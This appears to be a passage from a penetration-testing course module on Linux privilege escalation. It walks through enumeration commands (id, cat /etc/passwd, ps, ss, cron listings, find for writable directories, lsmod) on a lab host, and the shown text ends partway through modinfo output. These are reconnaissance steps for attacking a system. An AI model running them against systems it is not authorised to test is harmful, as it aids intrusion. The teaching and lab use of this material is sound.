In this Learning Module, we will cover the following Learning Units:

- Enumerating Linux
- Exposed Confidential Information
- Insecure File Permissions
- Abusing System Linux components

As with many other attack techniques, escalating privileges requires us to collect knowledge about the target. This is accomplished by enumerating the operating system for any kind of misconfiguration or software vulnerability that can be leveraged for our purposes.

As documented within the [*MITRE ATT&CK Framework*](https://attack.mitre.org/tactics/TA0004), privilege escalation is a tactic comprising different techniques that aim to leverage user permissions to access restricted resources.

In this Module, we will turn our attention to Linux-based targets. We will explore how to enumerate Linux machines and what constitutes Linux privileges. We'll then demonstrate common Linux-based privilege escalation techniques based on insecure file permissions and misconfigured system components.

## 18.1. Enumerating Linux

This Learning Unit covers the following Learning Objectives:

- Understand Files and Users' Privileges on Linux
- Perform Manual Enumeration
- Conduct Automated Enumeration

In this Learning Unit, we'll start with a refresher on the Linux privilege scheme, then move to performing manual and automated enumeration techniques.

## 18.1.1. Understanding Files and Users Privileges on Linux

Before discussing specific privilege escalation techniques, let's recap Linux privileges and access controls.

One of the defining features of Linux and other UNIX derivatives is that most resources, including files, directories, devices, and even network communications are represented in the [filesystem](https://wiki.archlinux.org/index.php/users_and_groups). Put colloquially, "everything is a file".

Every file (and by extension every element of a Linux system) abides by user and group permissions based on three primary properties: *read* (symbolized by **r**), *write* (symbolized by **w**), and *execute* (symbolized by **x**). Each file or directory has specific permissions for three categories of users: the *owner*, the *owner group*, and *others group*.

Each permission (rwx) allows the designated collection of users to perform different actions depending on if the resource is a file or a directory.

For files, *r* allows reading the file content, *w* allows changing its content and *x* allows the file to be run. A directory is handled differently from a file. Read access gives the right to consult the list of its contents (files and directories). Write access allows creating or deleting files. Finally, execute access allows crossing through the directory to access its contents (using the cd command, for example). Being able to cross through a directory without being able to read it gives the user permission to access known entries, but only by knowing their exact name.

Let's examine a simple combination of those file permissions using a real-world example on our local Kali machine, since it's based on the Linux Debian distribution.

```
kali@kali:~$ ls -l /etc/shadow
-rw-r----- 1 root shadow 1751 May  2 09:31 /etc/shadow
```

> Listing 1 - Inspecting file permissions and users ownership

For each user category, the three different access permissions are displayed. The very first hyphen we encounter describes the file type. Since it's not strictly related to [file permissions](https://en.wikipedia.org/wiki/File-system_permissions), we can safely ignore it.

The next three characters display the file owner (*root*) permissions, which are *rw-*, meaning the owner has read and write, but no execute privileges. Next, the *shadow* group owner has only been given read access, as the write and execute flag are unset. Finally, the others group has not been granted any access rights for this file.

We can now apply this introductory knowledge about Linux file permissions while performing privilege escalation enumeration in the next section.

## 18.1.2. Manual Enumeration

Manually enumerating Linux systems can be time consuming. However, this approach allows for a more controlled outcome because it helps identify more peculiar privilege escalation methods that are often overlooked by automated tools.

Furthermore, automated enumeration cannot replace manual investigation because the customized settings of our target environments are likely to be exactly those that are misconfigured.

Some of the commands in this Module may require minor modifications depending on the target operating system version. In addition, not all the commands presented in this section will be reproducible on the dedicated clients.

When gaining initial access to a target, one of the first things we should identify is the user context. We can use the [**id**](http://man7.org/linux/man-pages/man1/id.1.html) command to gather user context information. We can do so by connecting through SSH as the *joe* user to our Debian lab machine.

```
joe@debian-privesc:~$ id 
uid=1000(joe) gid=1000(joe) groups=1000(joe),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner)
```

> Listing 2 - Getting information about the current user

The output reveals that we are operating as the *joe* user, which has a [*User Identifier*](https://en.wikipedia.org/wiki/User_identifier) (UID) and Group Identifier (GID) of 1000. The user joe is also part of other groups that are out of scope for this Module.

To enumerate all users, we can simply read the contents of the **/etc/passwd** file.

```
joe@debian-privesc:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
...
Debian-gdm:x:117:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
joe:x:1000:1000:joe,,,:/home/joe:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
eve:x:1001:1001:,,,:/home/eve:/bin/bash
```

> Listing 3 - Getting information about the users

The **passwd** file lists several user accounts, including accounts used by various services on the target machine such as *www-data* and *sshd*. This indicates that a web server and an SSH server are likely installed on the system.

We can now zoom in on our current user's data:

- **Login Name**: "joe" - Indicates the username used for login.
- **Encrypted Password**: "x" - This field typically contains the hashed version of the user's password. In this case, the value *x* means that the entire password hash is contained in the **/etc/shadow** file (more on that shortly).
- **UID**: "1000" - Aside from the root user that has always a UID of *0*, Linux starts counting regular user IDs from 1000. This value is also called *real user ID*.
- **GID**: "1000" - Represents the user's specific Group ID.
- **Comment**: "joe,,," - This field generally contains a description about the user, often simply repeating username information.
- **Home Folder**: "/home/joe" - Describes the user's home directory prompted upon login.
- **Login Shell**: "/bin/bash" - Indicates the default interactive shell, if one exists.

In addition to the *joe* user, we also notice another user named *eve*, and we can infer this is a standard user since it has a configured home folder **/home/eve**. On the other hand, system services are configured with the **/usr/sbin/nologin** as login shell, where the *nologin* statement is used to block any remote or local login for service accounts.

Enumerating all users on a target machine can help identify potential high-privilege user accounts we could target to elevate our privileges.

Next, a machine's *hostname* can often provide clues about its functional roles. Often, the hostnames will include identifiable abbreviations such as *web* for a web server, *db* for a database server, *dc* for a domain controller, etc.

On most Linux distributions, we can find the hostname embedded in the command prompt. However, we should rely only on system commands to retrieve the target's information, since sometimes the prompt's text can be deceiving.

We can discover the hostname with the aptly named [**hostname**](https://linux.die.net/man/1/hostname) command.

```
joe@debian-privesc:~$ hostname
debian-privesc
```

> Listing 4 - Getting information about the hostname

Enterprises often enforce a naming convention scheme for hostnames, so they can be categorized by location, description, operating system, and service level. In our case, the hostname is comprised of only two parts: the OS type and the description.

Identifying the role of a machine can help us focus our information gathering efforts by increasing the context surrounding the host.

At some point during the privilege escalation process, we may need to rely on [*kernel*](https://en.wikipedia.org/wiki/Kernel_\(operating_system\)) exploits that specifically exploit vulnerabilities in the core of a target's operating system. These types of exploits are built for a very specific type of target, specified by a particular operating system and version combination. Since attacking a target with a mismatched kernel exploit can lead to system instability or even a crash, we must gather precise information about the target.

Any system instability caused by our penetration testing activity would likely alert system administrators prior to any SOC team. For this reason, we should be twice as careful when dealing with kernel exploits and, when possible, test the exploits in a local environment beforehand.

The **/etc/issue** and **/etc/\*-release** files contain information about the operating system release and version. We can also run the [**uname -a**](https://linux.die.net/man/1/uname) command:

```
joe@debian-privesc:~$ cat /etc/issue
Debian GNU/Linux 10 \n \l

joe@debian-privesc:~$ cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

joe@debian-privesc:~$ uname -a
Linux debian-privesc 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30)
x86_64 GNU/Linux
```

> Listing 5 - Getting the version of the running operating system and architecture

The **issue** and **os-release** files located in the **/etc** directory contain the operating system version (Debian 10) and release-specific information, including the distribution codename (buster). The command **uname -a** outputs the kernel version (4.19.0) and architecture (x86\_64).

Next, let's explore which running processes and services may allow us to elevate our privileges. For this to occur, the process must run in the context of a privileged account and must either have insecure permissions or allow us to interact with it in unintended ways.

We can list system processes (including those run by privileged users) with the [**ps**](http://man7.org/linux/man-pages/man1/ps.1.html) command. We'll use the **a** and **x** flags to list all processes with or without a [*tty*](https://www.linusakesson.net/programming/tty/) and the **u** flag to list the processes in a user-readable format.

```
joe@debian-privesc:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.4 169592 10176 ?        Ss   Aug16   0:02 /sbin/init
...
colord     752  0.0  0.6 246984 12424 ?        Ssl  Aug16   0:00 /usr/lib/colord/colord
Debian-+   753  0.0  0.2 157188  5248 ?        Sl   Aug16   0:00 /usr/lib/dconf/dconf-service
root       477  0.0  0.5 179064 11060 ?        Ssl  Aug16   0:00 /usr/sbin/cups-browsed
root       479  0.0  0.4 236048  9152 ?        Ssl  Aug16   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       486  0.0  1.0 123768 22104 ?        Ssl  Aug16   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root       510  0.0  0.3  13812  7288 ?        Ss   Aug16   0:00 /usr/sbin/sshd -D
root       512  0.0  0.3 241852  8080 ?        Ssl  Aug16   0:00 /usr/sbin/gdm3
root       519  0.0  0.4 166764  8308 ?        Sl   Aug16   0:00 gdm-session-worker [pam/gdm-launch-environment]
root       530  0.0  0.2  11164  4448 ?        Ss   Aug16   0:03 /usr/sbin/apache2 -k start
root      1545  0.0  0.0      0     0 ?        I    Aug16   0:00 [kworker/1:1-events]
root      1653  0.0  0.3  14648  7712 ?        Ss   01:03   0:00 sshd: joe [priv]
root      1656  0.0  0.0      0     0 ?        I    01:03   0:00 [kworker/1:2-events_power_efficient]
joe       1657  0.0  0.4  21160  8960 ?        Ss   01:03   0:00 /lib/systemd/systemd --user
joe       1658  0.0  0.1 170892  2532 ?        S    01:03   0:00 (sd-pam)
joe       1672  0.0  0.2  14932  5064 ?        S    01:03   0:00 sshd: joe@pts/0
joe       1673  0.0  0.2   8224  5020 pts/0    Ss   01:03   0:00 -bash
root      1727  0.0  0.0      0     0 ?        I    03:00   0:00 [kworker/0:0-ata_sff]
root      1728  0.0  0.0      0     0 ?        I    03:06   0:00 [kworker/0:2-ata_sff]
joe       1730  0.0  0.1  10600  3028 pts/0    R+   03:10   0:00 ps axu
```

> Listing 6 - Getting a list of running processes on Linux

The output lists several processes running as root that are worth researching for possible vulnerabilities. We'll notice the **ps** command we ran is also listed in the output, owned by the current user. We can also filter the specific user-owned process from the output with the appropriate username.

The next step in our analysis of the target host is to review available network interfaces, routes, and open ports. This information can help us determine if the compromised target is connected to multiple networks and therefore could be used as a pivot. The presence of specific virtual interfaces may also indicate the existence of virtualization or antivirus software.

An attacker may use a compromised target to pivot or move between connected networks. This will amplify network visibility and allow the attacker to target hosts not directly reachable from the original attack machine.

We can also investigate port bindings to see if a running service is only available on a loopback address, rather than on a routable one. Investigating a privileged program or service listening on the loopback interface could expand our attack surface and increase our probability of a privilege escalation attack's success.

Depending on the version of Linux, we can list the TCP/IP configuration of every network adapter with either [**ifconfig**](https://linux.die.net/man/8/ifconfig) or [**ip**](http://man7.org/linux/man-pages/man8/ip.8.html). While the former command displays interface statistics, the latter provides a compact version of the same information. Both commands accept the **a** flag to display all information available.

```
joe@debian-privesc:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:8a:b9:fc brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.214/24 brd 192.168.50.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe8a:b9fc/64 scope link
       valid_lft forever preferred_lft forever
3: ens224: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:8a:72:64 brd ff:ff:ff:ff:ff:ff
    inet 172.16.60.214/24 brd 172.16.60.255 scope global ens224
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe8a:7264/64 scope link
       valid_lft forever preferred_lft forever
```

> Listing 7 - Listing the full TCP/IP configuration on all available adapters on Linux

Based on the output above, the Linux client is also connected to more than one network.

We can display network routing tables with either [**route**](https://linux.die.net/man/8/route) or [**routel**](http://man7.org/linux/man-pages/man8/routel.8.html), depending on the Linux distribution and version. Both commands provide similar information.

```
joe@debian-privesc:~$ routel
         target            gateway          source    proto    scope    dev tbl
/usr/bin/routel: 48: shift: can't shift that many
        default     192.168.50.254                   static          ens192
    172.16.60.0 24                   172.16.60.214   kernel     link ens224
   192.168.50.0 24                  192.168.50.214   kernel     link ens192
      127.0.0.0          broadcast       127.0.0.1   kernel     link     lo local
      127.0.0.0 8            local       127.0.0.1   kernel     host     lo local
      127.0.0.1              local       127.0.0.1   kernel     host     lo local
127.255.255.255          broadcast       127.0.0.1   kernel     link     lo local
    172.16.60.0          broadcast   172.16.60.214   kernel     link ens224 local
  172.16.60.214              local   172.16.60.214   kernel     host ens224 local
  172.16.60.255          broadcast   172.16.60.214   kernel     link ens224 local
   192.168.50.0          broadcast  192.168.50.214   kernel     link ens192 local
 192.168.50.214              local  192.168.50.214   kernel     host ens192 local
 192.168.50.255          broadcast  192.168.50.214   kernel     link ens192 local
            ::1                                      kernel              lo
         fe80:: 64                                   kernel          ens224
         fe80:: 64                                   kernel          ens192
            ::1              local                   kernel              lo local
fe80::250:56ff:fe8a:7264              local                   kernel          ens224 local
fe80::250:56ff:fe8a:b9fc              local                   kernel          ens192 local
```

> Listing 8 - Printing the routes on Linux

Finally, we can display active network connections and listening ports using either [**netstat**](https://linux.die.net/man/8/netstat) or [**ss**](http://man7.org/linux/man-pages/man8/ss.8.html), both of which accept the same arguments.

For example, we can list all connections with **\-a**, avoid hostname resolution (which may stall the command execution) with **\-n**, and list the process name the connection belongs to with **\-p**. We can combine the arguments and simply run **ss -anp**:

```
joe@debian-privesc:~$ ss -anp
Netid      State       Recv-Q      Send-Q                                        Local Address:Port                     Peer Address:Port
nl         UNCONN      0           0                                                         0:461                                  *
nl         UNCONN      0           0                                                         0:323                                  *
nl         UNCONN      0           0                                                         0:457                                  *
...
udp        UNCONN      0           0                                                      [::]:47620                            [::]:*
tcp        LISTEN      0           128                                                 0.0.0.0:22                            0.0.0.0:*
tcp        LISTEN      0           5                                                 127.0.0.1:631                           0.0.0.0:*
tcp        ESTAB       0           36                                           192.168.50.214:22                      192.168.118.2:32890
tcp        LISTEN      0           128                                                       *:80                                  *:*
tcp        LISTEN      0           128                                                    [::]:22                               [::]:*
tcp        LISTEN      0           5                                                     [::1]:631                              [::]:*
```

> Listing 9 - Listing all active network connections on Linux

The output lists the various listening ports and active sessions, including our own active SSH connection and its listening socket.

Continuing with our baseline enumeration, let's focus next on firewall rules.

In general, we're primarily interested in a firewall's state, profile, and rules during the remote exploitation phase of an assessment. However, this information can also be useful during privilege escalation. For example, if a network service is not remotely accessible because it is blocked by the firewall, it is generally accessible locally via the loopback interface. If we can interact with these services locally, we may be able to exploit them to escalate our privileges on the local system.

During this phase, we can also gather information about inbound and outbound port filtering to facilitate port forwarding and tunneling when it's time to pivot to an internal network.

On Linux-based systems, we must have *root* privileges to list firewall rules with [*iptables*](https://linux.die.net/man/8/iptables). However, depending on how the firewall is configured, we may be able to glean information about the rules as a standard user.

For example, the [*iptables-persistent*](https://packages.debian.org/sid/iptables-persistent) package on Debian Linux saves firewall rules in specific files under **/etc/iptables** by default. These files are used by the system to restore [*netfilter*](https://www.netfilter.org/) rules at boot time. These files are often left with weak permissions, allowing them to be read by any local user on the target system.

We can also search for files created by the *iptables-save* command, which is used to dump the firewall configuration to a file specified by the user. This file is then usually used as input for the *iptables-restore* command and used to restore the firewall rules at boot time. If a system administrator had ever run this command, we could search the configuration directory (**/etc**) or grep the file system for iptables commands to locate the file. If the file has insecure permissions, we could use the contents to infer the firewall configuration rules running on the system.

```
joe@debian-privesc:~$ cat /etc/iptables/rules.v4
# Generated by xtables-save v1.8.2 on Thu Aug 18 12:53:22 2022
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 1999 -j ACCEPT
COMMIT
# Completed on Thu Aug 18 12:53:22 2022
```

> Listing 10 - Inspecting custom IP tables

Since this file is read-only by any users other than root, we can inspect its contents. We'll notice a non-default rule that explicitly allows the destination port *1999*. This configuration detail stands out and should be noted for later investigation.

Next, let's examine scheduled tasks that attackers commonly leverage during privilege escalation attacks. Systems acting as servers often periodically execute various automated, scheduled tasks. When these systems are misconfigured, or the user-created files are left with insecure permissions, we can modify these files that will be executed by the scheduling system at a high privilege level.

The Linux-based job scheduler is known as [*cron*](https://en.wikipedia.org/wiki/Cron). Scheduled tasks are listed under the **/etc/cron.\*** directories, where *\** represents the frequency at which the task will run. For example, tasks that will be run daily can be found under **/etc/cron.daily**. Each script is listed in its own subdirectory.

```
joe@debian-privesc:~$ ls -lah /etc/cron*
-rw-r--r-- 1 root root 1.1K Oct 11  2019 /etc/crontab

/etc/cron.d:
total 24K
drwxr-xr-x   2 root root 4.0K Aug 16 04:25 .
drwxr-xr-x 120 root root  12K Aug 18 12:37 ..
-rw-r--r--   1 root root  102 Oct 11  2019 .placeholder
-rw-r--r--   1 root root  285 May 19  2019 anacron

/etc/cron.daily:
total 60K
drwxr-xr-x   2 root root 4.0K Aug 18 09:05 .
drwxr-xr-x 120 root root  12K Aug 18 12:37 ..
-rw-r--r--   1 root root  102 Oct 11  2019 .placeholder
-rwxr-xr-x   1 root root  311 May 19  2019 0anacron
-rwxr-xr-x   1 root root  539 Aug  8  2020 apache2
-rwxr-xr-x   1 root root 1.5K Dec  7  2020 apt-compat
-rwxr-xr-x   1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x   1 root root  384 Dec 31  2018 cracklib-runtime
-rwxr-xr-x   1 root root 1.2K Apr 18  2019 dpkg
-rwxr-xr-x   1 root root 2.2K Feb 10  2018 locate
-rwxr-xr-x   1 root root  377 Aug 28  2018 logrotate
-rwxr-xr-x   1 root root 1.1K Feb 10  2019 man-db
-rwxr-xr-x   1 root root  249 Sep 27  2017 passwd

/etc/cron.hourly:
total 20K
drwxr-xr-x   2 root root 4.0K Aug 16 04:17 .
drwxr-xr-x 120 root root  12K Aug 18 12:37 ..
-rw-r--r--   1 root root  102 Oct 11  2019 .placeholder

/etc/cron.monthly:
total 24K
drwxr-xr-x   2 root root 4.0K Aug 16 04:25 .
drwxr-xr-x 120 root root  12K Aug 18 12:37 ..
-rw-r--r--   1 root root  102 Oct 11  2019 .placeholder
-rwxr-xr-x   1 root root  313 May 19  2019 0anacron

/etc/cron.weekly:
total 28K
drwxr-xr-x   2 root root 4.0K Aug 16 04:26 .
drwxr-xr-x 120 root root  12K Aug 18 12:37 ..
-rw-r--r--   1 root root  102 Oct 11  2019 .placeholder
-rwxr-xr-x   1 root root  312 May 19  2019 0anacron
-rwxr-xr-x   1 root root  813 Feb 10  2019 man-db
joe@debian-privesc:~$
```

> Listing 11 - Listing all cron jobs

Listing the directory contents, we notice several tasks scheduled to run daily.

It is worth noting that system administrators often add their own scheduled tasks in the **/etc/crontab** file. These tasks should be inspected carefully for insecure file permissions, since most jobs in this file will run as root. To view the current user's scheduled jobs, we can run **crontab** followed by the **\-l** parameter.

```
joe@debian-privesc:~$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command
```

> Listing 12 - Listing cron jobs for the current user

In the above output, only the commented instructions are present, meaning no cron job has been configured for the user *joe*. However, if we try to run the same command with the **sudo** prefix, we discover that a backup script is scheduled to run every minute.

```
joe@debian-privesc:~$ sudo crontab -l
[sudo] password for joe:
# Edit this file to introduce tasks to be run by cron.
...
# m h  dom mon dow   command

* * * * * /bin/bash /home/joe/.scripts/user_backups.sh
```

> Listing 13 - Listing cron jobs for the root user

Listing cron jobs using sudo reveals jobs run by the *root* user. In this example, it shows a backup script running as root. If this file has weak permissions, we may be able to leverage it to escalate our privileges.

As we'll learn later in this Module, the *joe* user has been granted specific sudo permission only to list cron jobs running as the root user. This permission alone cannot be abused to obtain a root shell.

At some point, we may need to leverage an exploit to escalate our local privileges. If so, our search for a working exploit begins with the enumeration of all installed applications, noting the version of each. We can use this information to search for a matching exploit.

Manually searching for this information could be very time consuming and ineffective, so we'll learn how to automate this process in the next section. However, we should know how to manually query installed packages as this is needed to corroborate information obtained during previous enumeration steps.

Linux-based systems use a variety of package managers. For example, Debian-based Linux distributions, like the one in our lab, use [*dpkg*](https://linux.die.net/man/1/dpkg), while Red Hat-based systems use [*rpm*](https://linux.die.net/man/8/rpm).

To list applications installed by dpkg on our Debian system, we can use **dpkg -l**.

```
joe@debian-privesc:~$ dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                                  Version                                      Architecture Description
+++-=====================================-============================================-============-===============================================================================
ii  accountsservice                       0.6.45-2                                     amd64        query and manipulate user account information
ii  acl                                   2.2.53-4                                     amd64        access control list - utilities
ii  adduser                               3.118                                        all          add and remove users and groups
ii  adwaita-icon-theme                    3.30.1-1                                     all          default icon theme of GNOME
ii  aisleriot                             1:3.22.7-2                                   amd64        GNOME solitaire card game collection
ii  alsa-utils                            1.1.8-2                                      amd64        Utilities for configuring and using ALSA
ii  anacron                               2.3-28                                       amd64        cron-like program that doesn't go by time
ii  analog                                2:6.0-22                                     amd64        web server log analyzer
ii  apache2                               2.4.38-3+deb10u7                             amd64        Apache HTTP Server
ii  apache2-bin                           2.4.38-3+deb10u7                             amd64        Apache HTTP Server (modules and other binary files)
ii  apache2-data                          2.4.38-3+deb10u7                             all          Apache HTTP Server (common files)
ii  apache2-doc                           2.4.38-3+deb10u7                             all          Apache HTTP Server (on-site documentation)
ii  apache2-utils                         2.4.38-3+deb10u7                             amd64        Apache HTTP Server (utility programs for web servers)
...
```

> Listing 14 - Listing all installed packages on a Debian Linux operating system

This confirms what we expected earlier from enumerating listening ports: the Debian 10 machine is, in fact, running a web server. In this case, it is running Apache2.

As we previously mentioned, files with insufficient access restrictions can create a vulnerability that may grant an attacker elevated privileges. This most often happens when an attacker can modify scripts or binary files that are executed under the context of a privileged account.

Sensitive files that are readable by an unprivileged user may also contain important information such as hard-coded credentials for a database or a service account running with higher privileges.

Since it is not feasible to manually check the permissions of each file and directory, we need to automate this task as much as possible. As a start, we can use [**find**](http://man7.org/linux/man-pages/man1/find.1.html) to identify files with insecure permissions.

In the example below, we are searching for every directory writable by the current user on the target system. We'll search the whole root directory (**/**) and use the **\-writable** argument to specify the attribute we are interested in. We can also use **\-type d** to locate directories, and filter errors with **2>/dev/null**:

```
joe@debian-privesc:~$ find / -writable -type d 2>/dev/null
..
/home/joe
/home/joe/Videos
/home/joe/Templates
/home/joe/.local
/home/joe/.local/share
/home/joe/.local/share/sounds
/home/joe/.local/share/evolution
/home/joe/.local/share/evolution/tasks
/home/joe/.local/share/evolution/tasks/system
/home/joe/.local/share/evolution/tasks/trash
/home/joe/.local/share/evolution/addressbook
/home/joe/.local/share/evolution/addressbook/system
/home/joe/.local/share/evolution/addressbook/system/photos
/home/joe/.local/share/evolution/addressbook/trash
/home/joe/.local/share/evolution/mail
/home/joe/.local/share/evolution/mail/trash
/home/joe/.local/share/evolution/memos
/home/joe/.local/share/evolution/memos/system
/home/joe/.local/share/evolution/memos/trash
/home/joe/.local/share/evolution/calendar
/home/joe/.local/share/evolution/calendar/system
/home/joe/.local/share/evolution/calendar/trash
/home/joe/.local/share/icc
/home/joe/.local/share/gnome-shell
/home/joe/.local/share/gnome-settings-daemon
/home/joe/.local/share/keyrings
/home/joe/.local/share/tracker
/home/joe/.local/share/tracker/data
/home/joe/.local/share/folks
/home/joe/.local/share/gvfs-metadata
/home/joe/.local/share/applications
/home/joe/.local/share/nano
/home/joe/Downloads
/home/joe/.scripts
/home/joe/Pictures
/home/joe/.cache

...
```

> Listing 15 - Listing all world writable directories

As shown above, several directories seem to be world-writable, including the **/home/joe/.scripts** directory, which is the location of the cron script we found earlier. This certainly warrants further investigation.

Let's move further with our enumeration. On most systems, drives are automatically mounted at boot time. Because of this, it's easy to forget about unmounted drives that could contain valuable information. We should always look for unmounted drives, and if they exist, check the mount permissions.

On Linux-based systems, we can use [**mount**](https://linux.die.net/man/8/mount) to list all mounted filesystems. In addition, the [**/etc/fstab**](https://geek-university.com/linux/etc-fstab-file) file lists all drives that will be mounted at boot time.

```
joe@debian-privesc:~$ cat /etc/fstab 
...
UUID=60b4af9b-bc53-4213-909b-a2c5e090e261 /               ext4    errors=remount-ro 0       1
# swap was on /dev/sda5 during installation
UUID=86dc11f3-4b41-4e06-b923-86e78eaddab7 none            swap    sw              0       0
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0

joe@debian-privesc:~$ mount
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,nosuid,relatime,size=1001064k,nr_inodes=250266,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=204196k,mode=755)
/dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup2 on /sys/fs/cgroup/unified type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
bpf on /sys/fs/bpf type bpf (rw,nosuid,nodev,noexec,relatime,mode=700)
...
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=25,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=10550)
mqueue on /dev/mqueue type mqueue (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime,pagesize=2M)
tmpfs on /run/user/117 type tmpfs (rw,nosuid,nodev,relatime,size=204192k,mode=700,uid=117,gid=124)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=204192k,mode=700,uid=1000,gid=1000)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
```

> Listing 16 - Listing content of /etc/fstab and all mounted drives

The output reveals a swap partition and the primary ext4 disk of this Linux system.

Keep in mind that the system administrator might have used custom configurations or scripts to mount drives that are not listed in the **/etc/fstab** file. Because of this, it's good practice to not only scan **/etc/fstab**, but to also gather information about mounted drives using **mount**.

Furthermore, we can use [**lsblk**](https://linux.die.net/man/8/lsblk) to view all available disks.

```
joe@debian-privesc:~$ lsblk
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
sda      8:0    0   32G  0 disk
|-sda1   8:1    0   31G  0 part /
|-sda2   8:2    0    1K  0 part
\`-sda5   8:5    0  975M  0 part [SWAP]
sr0     11:0    1 1024M  0 rom
```

> Listing 17 - Listing all available drives using lsblk

We'll notice that the *sda* drive consists of three different numbered partitions. In some situations, showing information for all local disks on the system might reveal partitions that are not mounted. Depending on the system configuration (or misconfiguration), we then might be able to mount those partitions and search for interesting documents, credentials, or other information that could allow us to escalate our privileges or get a better foothold in the network.

Another common privilege escalation technique involves exploitation of device drivers and kernel modules. We will explore actual exploitation tactics later in this Module, but first let's examine some important enumeration techniques.

Since this technique relies on matching vulnerabilities with corresponding exploits, we'll need to gather a list of drivers and kernel modules that are loaded on the target. We can enumerate the loaded kernel modules using **lsmod** without any additional arguments.

```
joe@debian-privesc:~$ lsmod
Module                  Size  Used by
binfmt_misc            20480  1
rfkill                 28672  1
sb_edac                24576  0
crct10dif_pclmul       16384  0
crc32_pclmul           16384  0
ghash_clmulni_intel    16384  0
vmw_balloon            20480  0
...
drm                   495616  5 vmwgfx,drm_kms_helper,ttm
libata                270336  2 ata_piix,ata_generic
vmw_pvscsi             28672  2
scsi_mod              249856  5 vmw_pvscsi,sd_mod,libata,sg,sr_mod
i2c_piix4              24576  0
button                 20480  0
```

> Listing 18 - Listing loaded drivers

Once we've collected the list of loaded modules and identified those, we want more information about, such as **libata** in the above example, we can use **modinfo** to find out more about the specific module. We should note that this tool requires the full path to run.

```
joe@debian-privesc:~$ /sbin/modinfo libata
filename:       /lib/modules/4.19.0-21-amd64/kernel/drivers/ata/libata.ko
version:        3.00
license:        GPL
description:    Library module for ATA devices
author:         Jeff Garzik
srcversion:     00E4F01BB3AA2AAF98137BF
